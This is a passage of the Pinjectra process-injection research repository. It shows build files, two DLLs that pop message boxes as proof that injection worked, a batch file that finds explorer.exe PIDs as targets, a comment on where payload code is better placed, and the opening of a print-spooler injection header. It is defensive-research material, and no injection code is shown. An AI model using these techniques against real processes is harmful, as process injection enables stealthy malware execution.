├── .gitignore
├── LICENSE
├── MsgBoxOnGetMsgProc
├── MsgBoxOnGetMsgProc.vcxproj
├── MsgBoxOnGetMsgProc.vcxproj.filters
└── dllmain_getmsgproc.cpp
├── MsgBoxOnProcessAttach
├── MsgBoxOnProcessAttach.vcxproj
├── MsgBoxOnProcessAttach.vcxproj.filters
└── dllmain_msgbox.cpp
├── PIDOF_EXPLORER.bat
├── Pinjector
├── ALPC.cpp
├── ALPC.h
├── Adapters.cpp
├── CFMA_MVOF_NUVOS_NMVOS.cpp
├── CFMA_MVOF_NUVOS_NMVOS.h
├── CFMA_MVOF_OP_PNMVOS.cpp
├── CFMA_MVOF_OP_PNMVOS.h
├── CreateRemoteThread.cpp
├── CreateRemoteThread.h
├── CtrlInject.cpp
├── CtrlInject.h
├── DynamicPayloads.cpp
├── DynamicPayloads.h
├── ExecutionTechnique.h
├── GhostWriting.cpp
├── GhostWriting.h
├── HookProcProvider.h
├── LLA_GPA.cpp
├── LLA_GPA.h
├── NQAT_WITH_MEMSET.cpp
├── NQAT_WITH_MEMSET.h
├── OP_VAE_WPM.cpp
├── OP_VAE_WPM.h
├── OT_OP_VAE_GAAA.cpp
├── OT_OP_VAE_GAAA.h
├── PROPagate.cpp
├── PROPagate.h
├── Pinjector.vcxproj
├── Pinjector.vcxproj.filters
├── Pinjectra.rc
├── PinjectraDemo.cpp
├── PinjectraPacket.h
├── QueueUserAPC.cpp
├── QueueUserAPC.h
├── SIR.cpp
├── SIR.h
├── SetWindowLongPtrA.cpp
├── SetWindowLongPtrA.h
├── StaticPayloads.c
├── StaticPayloads.h
├── VAE_WPM.cpp
├── VAE_WPM.h
├── WindowsHook.cpp
├── WindowsHook.h
├── WritingTechniques.h
├── memmem.c
├── memmem.h
├── misc.c
├── misc.h
└── ntapi.h
├── Pinjectra.sln
├── README.md
└── TestProcess
├── TestProcess.c
├── TestProcess.vcxproj
└── TestProcess.vcxproj.filters
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 |
27 | # Visual Studio 2015/2017 cache/options directory
28 | .vs/
29 | # Uncomment if you have tasks that create the project's static files in wwwroot
30 | #wwwroot/
31 |
32 | # Visual Studio 2017 auto generated files
33 | Generated\ Files/
34 |
35 | # MSTest test Results
36 | [Tt]est[Rr]esult*/
37 | [Bb]uild[Ll]og.*
38 |
39 | # NUNIT
40 | *.VisualState.xml
41 | TestResult.xml
42 |
43 | # Build Results of an ATL Project
44 | [Dd]ebugPS/
45 | [Rr]eleasePS/
46 | dlldata.c
47 |
48 | # Benchmark Results
49 | BenchmarkDotNet.Artifacts/
50 |
51 | # .NET Core
52 | project.lock.json
53 | project.fragment.lock.json
54 | artifacts/
55 | **/Properties/launchSettings.json
56 |
57 | # StyleCop
58 | StyleCopReport.xml
59 |
60 | # Files built by Visual Studio
61 | *_i.c
62 | *_p.c
63 | *_i.h
64 | *.ilk
65 | *.meta
66 | *.obj
67 | *.iobj
68 | *.pch
69 | *.pdb
70 | *.ipdb
71 | *.pgc
72 | *.pgd
73 | *.rsp
74 | *.sbr
75 | *.tlb
76 | *.tli
77 | *.tlh
78 | *.tmp
79 | *.tmp_proj
80 | *.log
81 | *.vspscc
82 | *.vssscc
83 | .builds
84 | *.pidb
85 | *.svclog
86 | *.scc
87 |
88 | # Chutzpah Test files
89 | _Chutzpah*
90 |
91 | # Visual C++ cache files
92 | ipch/
93 | *.aps
94 | *.ncb
95 | *.opendb
96 | *.opensdf
97 | *.sdf
98 | *.cachefile
99 | *.VC.db
100 | *.VC.VC.opendb
101 |
102 | # Visual Studio profiler
103 | *.psess
104 | *.vsp
105 | *.vspx
106 | *.sap
107 |
108 | # Visual Studio Trace Files
109 | *.e2e
110 |
111 | # TFS 2012 Local Workspace
112 | $tf/
113 |
114 | # Guidance Automation Toolkit
115 | *.gpState
116 |
117 | # ReSharper is a .NET coding add-in
118 | _ReSharper*/
119 | *.[Rr]e[Ss]harper
120 | *.DotSettings.user
121 |
122 | # JustCode is a .NET coding add-in
123 | .JustCode
124 |
125 | # TeamCity is a build add-in
126 | _TeamCity*
127 |
128 | # DotCover is a Code Coverage Tool
129 | *.dotCover
130 |
131 | # AxoCover is a Code Coverage Tool
132 | .axoCover/*
133 | !.axoCover/settings.json
134 |
135 | # Visual Studio code coverage results
136 | *.coverage
137 | *.coveragexml
138 |
139 | # NCrunch
140 | _NCrunch_*
141 | .*crunch*.local.xml
142 | nCrunchTemp_*
143 |
144 | # MightyMoose
145 | *.mm.*
146 | AutoTest.Net/
147 |
148 | # Web workbench (sass)
149 | .sass-cache/
150 |
151 | # Installshield output folder
152 | [Ee]xpress/
153 |
154 | # DocProject is a documentation generator add-in
155 | DocProject/buildhelp/
156 | DocProject/Help/*.HxT
157 | DocProject/Help/*.HxC
158 | DocProject/Help/*.hhc
159 | DocProject/Help/*.hhk
160 | DocProject/Help/*.hhp
161 | DocProject/Help/Html2
162 | DocProject/Help/html
163 |
164 | # Click-Once directory
165 | publish/
166 |
167 | # Publish Web Output
168 | *.[Pp]ublish.xml
169 | *.azurePubxml
170 | # Note: Comment the next line if you want to checkin your web deploy settings,
171 | # but database connection strings (with potential passwords) will be unencrypted
172 | *.pubxml
173 | *.publishproj
174 |
175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
176 | # checkin your Azure Web App publish settings, but sensitive information contained
177 | # in these scripts will be unencrypted
178 | PublishScripts/
179 |
180 | # NuGet Packages
181 | *.nupkg
182 | # The packages folder can be ignored because of Package Restore
183 | **/[Pp]ackages/*
184 | # except build/, which is used as an MSBuild target.
185 | !**/[Pp]ackages/build/
186 | # Uncomment if necessary however generally it will be regenerated when needed
187 | #!**/[Pp]ackages/repositories.config
188 | # NuGet v3's project.json files produces more ignorable files
189 | *.nuget.props
190 | *.nuget.targets
191 |
192 | # Microsoft Azure Build Output
193 | csx/
194 | *.build.csdef
195 |
196 | # Microsoft Azure Emulator
197 | ecf/
198 | rcf/
199 |
200 | # Windows Store app package directories and files
201 | AppPackages/
202 | BundleArtifacts/
203 | Package.StoreAssociation.xml
204 | _pkginfo.txt
205 | *.appx
206 |
207 | # Visual Studio cache files
208 | # files ending in .cache can be ignored
209 | *.[Cc]ache
210 | # but keep track of directories ending in .cache
211 | !*.[Cc]ache/
212 |
213 | # Others
214 | ClientBin/
215 | ~$*
216 | *~
217 | *.dbmdl
218 | *.dbproj.schemaview
219 | *.jfm
220 | *.pfx
221 | *.publishsettings
222 | orleans.codegen.cs
223 |
224 | # Including strong name files can present a security risk
225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
226 | #*.snk
227 |
228 | # Since there are multiple workflows, uncomment next line to ignore bower_components
229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
230 | #bower_components/
231 |
232 | # RIA/Silverlight projects
233 | Generated_Code/
234 |
235 | # Backup & report files from converting an old project file
236 | # to a newer Visual Studio version. Backup files are not needed,
237 | # because we have git ;-)
238 | _UpgradeReport_Files/
239 | Backup*/
240 | UpgradeLog*.XML
241 | UpgradeLog*.htm
242 | ServiceFabricBackup/
243 | *.rptproj.bak
244 |
245 | # SQL Server files
246 | *.mdf
247 | *.ldf
248 | *.ndf
249 |
250 | # Business Intelligence projects
251 | *.rdl.data
252 | *.bim.layout
253 | *.bim_*.settings
254 | *.rptproj.rsuser
255 |
256 | # Microsoft Fakes
257 | FakesAssemblies/
258 |
259 | # GhostDoc plugin setting file
260 | *.GhostDoc.xml
261 |
262 | # Node.js Tools for Visual Studio
263 | .ntvs_analysis.dat
264 | node_modules/
265 |
266 | # Visual Studio 6 build log
267 | *.plg
268 |
269 | # Visual Studio 6 workspace options file
270 | *.opt
271 |
272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
273 | *.vbw
274 |
275 | # Visual Studio LightSwitch build output
276 | **/*.HTMLClient/GeneratedArtifacts
277 | **/*.DesktopClient/GeneratedArtifacts
278 | **/*.DesktopClient/ModelManifest.xml
279 | **/*.Server/GeneratedArtifacts
280 | **/*.Server/ModelManifest.xml
281 | _Pvt_Extensions
282 |
283 | # Paket dependency manager
284 | .paket/paket.exe
285 | paket-files/
286 |
287 | # FAKE - F# Make
288 | .fake/
289 |
290 | # JetBrains Rider
291 | .idea/
292 | *.sln.iml
293 |
294 | # CodeRush
295 | .cr/
296 |
297 | # Python Tools for Visual Studio (PTVS)
298 | __pycache__/
299 | *.pyc
300 |
301 | # Cake - Uncomment if you are using it
302 | # tools/**
303 | # !tools/packages.config
304 |
305 | # Tabs Studio
306 | *.tss
307 |
308 | # Telerik's JustMock configuration file
309 | *.jmconfig
310 |
311 | # BizTalk build output
312 | *.btp.cs
313 | *.btm.cs
314 | *.odx.cs
315 | *.xsd.cs
316 |
317 | # OpenCover UI analysis results
318 | OpenCover/
319 |
320 | # Azure Stream Analytics local run output
321 | ASALocalRun/
322 |
323 | # MSBuild Binary and Structured Log
324 | *.binlog
325 |
326 | # NVidia Nsight GPU debugger configuration file
327 | *.nvuser
328 |
329 | # MFractors (Xamarin productivity tool) working folder
330 | .mfractor/
331 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2019, SafeBreach Labs
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/MsgBoxOnGetMsgProc.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {03EFD090-F799-4071-B684-A3086CF2FA70}
24 | Win32Proj
25 | MsgBoxOnGetMsgProc
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | NotUsing
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | pch.h
96 |
97 |
98 | Windows
99 | true
100 | true
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | pch.h
114 |
115 |
116 | Windows
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | NotUsing
124 | Level3
125 | Disabled
126 | true
127 | _DEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
128 | true
129 | pch.h
130 |
131 |
132 | Windows
133 | true
134 | false
135 |
136 |
137 |
138 |
139 | Use
140 | Level3
141 | MaxSpeed
142 | true
143 | true
144 | true
145 | WIN32;NDEBUG;MSGBOXONGETMSGPROC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
146 | true
147 | pch.h
148 |
149 |
150 | Windows
151 | true
152 | true
153 | true
154 | false
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/MsgBoxOnGetMsgProc.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/MsgBoxOnGetMsgProc/dllmain_getmsgproc.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
34 | // Windows Header Files
#include <windows.h>
36 |
// Entry point of the WH_GETMESSAGE demo payload. Nothing is done for any of
// the four notifications; the visible effect lives in GetMsgProc, which the
// injector installs with SetWindowsHookEx once this DLL is mapped.
//
// hinstDLL    - module handle of this DLL (unused).
// fdwReason   - DLL_PROCESS_ATTACH / DLL_THREAD_ATTACH / DLL_THREAD_DETACH /
//               DLL_PROCESS_DETACH.
// lpvReserved - unused.
// Returns TRUE so that DLL_PROCESS_ATTACH never fails the load; the loader
// ignores the return value for the other reasons.
//
// Keep it this empty on purpose: DllMain runs under the loader lock, so
// loading DLLs, waiting on threads or pumping messages from here can
// deadlock the target.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    (void)hinstDLL;
    (void)fdwReason;    // no per-process or per-thread state to manage
    (void)lpvReserved;
    return TRUE;
}
59 |
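// WH_GETMESSAGE hook procedure, exported so the injector can pass it to
// SetWindowsHookEx(). Proves the DLL is running in the hooked thread by
// showing a message box whenever that thread retrieves a message.
//
// code   - hook code; a negative value means "do not process, just chain".
// wParam - PM_REMOVE / PM_NOREMOVE flag of the GetMessage/PeekMessage call.
// lParam - pointer to the MSG being retrieved (not inspected here).
// Returns whatever the next hook in the chain returns.
extern "C" __declspec(dllexport) LRESULT CALLBACK GetMsgProc(_In_ int code, _In_ WPARAM wParam, _In_ LPARAM lParam) {
    // Contract for every hook procedure: when code < 0 the hook must not act
    // on the message and must hand it to CallNextHookEx() unchanged.
    if (code < 0) {
        return CallNextHookEx(NULL, code, wParam, lParam);
    }

    // MessageBoxA runs a modal message loop on this very thread, and every
    // message that loop retrieves can re-enter this hook. Without a guard
    // that nests message boxes until the stack runs out, so the demo only
    // shows one box per hooked message, never one inside another.
    static thread_local BOOL s_inHook = FALSE;
    if (!s_inHook) {
        s_inHook = TRUE;
        MessageBoxA(NULL, "Hello from GetMsgProc", "Hook DLL", MB_OK);
        s_inHook = FALSE;
    }

    return CallNextHookEx(NULL, code, wParam, lParam);
}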
64 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/MsgBoxOnProcessAttach.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {259CE055-7726-4963-AFC5-42C8847BF53D}
24 | Win32Proj
25 | MsgBoxOnProcessAttach
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | NotUsing
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | pch.h
96 |
97 |
98 | Windows
99 | true
100 | true
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | pch.h
114 |
115 |
116 | Windows
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | NotUsing
124 | Level3
125 | Disabled
126 | true
127 | _DEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
128 | true
129 | pch.h
130 |
131 |
132 | Windows
133 | true
134 | false
135 |
136 |
137 |
138 |
139 | Use
140 | Level3
141 | MaxSpeed
142 | true
143 | true
144 | true
145 | WIN32;NDEBUG;MSGBOXONPROCESSATTACH_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
146 | true
147 | pch.h
148 |
149 |
150 | Windows
151 | true
152 | true
153 | true
154 | false
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/MsgBoxOnProcessAttach.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/MsgBoxOnProcessAttach/dllmain_msgbox.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
#include <windows.h>
32 |
// Entry point of the "MsgBoxOnProcessAttach" demo payload. Its only job is
// to pop a message box the moment the DLL is first mapped, so that any
// injection technique that gets this DLL loaded produces visible proof.
//
// hModule            - module handle of this DLL (unused).
// ul_reason_for_call - DLL_PROCESS_ATTACH/DETACH, DLL_THREAD_ATTACH/DETACH.
// lpReserved         - unused.
// Returns TRUE (the load is never refused).
//
// Caveat for anyone copying this as a template: DllMain executes while the
// loader lock is held. MessageBoxA pumps a modal message loop and can pull
// further DLLs into the process, which the DllMain rules forbid; it is fine
// for a demo but not a pattern for real payloads (do the work from a
// thread, hook or APC after the DLL is mapped).
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBoxA(NULL, "SimpleDLL loaded successfully!", "SimpleDll MessageBox", MB_OK);
    }
    // Thread attach/detach and process detach: nothing to do.
    return TRUE;
}
50 |
--------------------------------------------------------------------------------
/PIDOF_EXPLORER.bat:
--------------------------------------------------------------------------------
1 | @rem Copyright (c) 2019, SafeBreach
2 | @rem All rights reserved.
3 | @rem
4 | @rem Redistribution and use in source and binary forms, with or without
5 | @rem modification, are permitted provided that the following conditions are met:
6 | @rem
7 | @rem * Redistributions of source code must retain the above copyright notice,
8 | @rem this list of conditions and the following disclaimer.
9 | @rem * Redistributions in binary form must reproduce the above copyright
10 | @rem notice, this list of conditions and the following disclaimer in the
11 | @rem documentation and/or other materials provided with the distribution.
12 | @rem * Neither the name of the copyright holder nor the names of its
13 | @rem contributors may be used to endorse or promote products derived from
14 | @rem this software without specific prior written permission.
15 | @rem
16 | @rem THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | @rem AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | @rem IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | @rem ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | @rem LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | @rem CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | @rem SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | @rem INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | @rem CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | @rem ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | @rem POSSIBILITY OF SUCH DAMAGE.
27 |
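@echo off
rem Print the tasklist CSV row(s) for every running explorer.exe so the PID
rem column can be handed to the injector demo. Output is the verbose (/v) row
rem without the header line (/nh), one row per explorer instance/session.
rem
rem /fi matches the image name exactly. The previous "findstr explorer.exe"
rem was a regular expression (the dot matched any character) applied to the
rem whole verbose row, so it also matched window titles or user names that
rem merely contained the text.
rem Note: when nothing matches, tasklist prints an INFO line instead of
rem producing no output.
tasklist /v /fo csv /nh /fi "imagename eq explorer.exe"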
30 |
--------------------------------------------------------------------------------
/Pinjector/ALPC.h:
--------------------------------------------------------------------------------
1 | // BASED ON
2 | // https://github.com/odzhan/injection/tree/master/spooler
3 | // https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler/
4 |
5 | // Copyright (c) 2019, SafeBreach
6 | // All rights reserved.
7 | //
8 | // Redistribution and use in source and binary forms, with or without
9 | // modification, are permitted provided that the following conditions are met:
10 | //
11 | // * Redistributions of source code must retain the above copyright notice,
12 | // this list of conditions and the following disclaimer.
13 | // * Redistributions in binary form must reproduce the above copyright
14 | // notice, this list of conditions and the following disclaimer in the
15 | // documentation and/or other materials provided with the distribution.
16 | // * Neither the name of the copyright holder nor the names of its
17 | // contributors may be used to endorse or promote products derived from
18 | // this software without specific prior written permission.
19 | //
20 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
23 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
24 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
25 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
26 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
27 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
28 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
29 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
30 | // POSSIBILITY OF SUCH DAMAGE.
31 |
32 | // AUTHORS: Amit Klein, Itzik Kotler
33 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
34 |
35 | #pragma once
36 |
37 | // Standard Include's
#include <windows.h>
#include <string>
#include <vector>
40 |
41 | // Local Include's
42 | #include "ExecutionTechnique.h"
43 | #include "WritingTechniques.h"
44 |
45 | // Macros
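// NTSTATUS success test: every non-error status (success and informational)
// is non-negative. Evaluates x once.
#define NT_SUCCESS(x) ((x)>=0)

// Resolve an ntdll export at the point of use, e.g.
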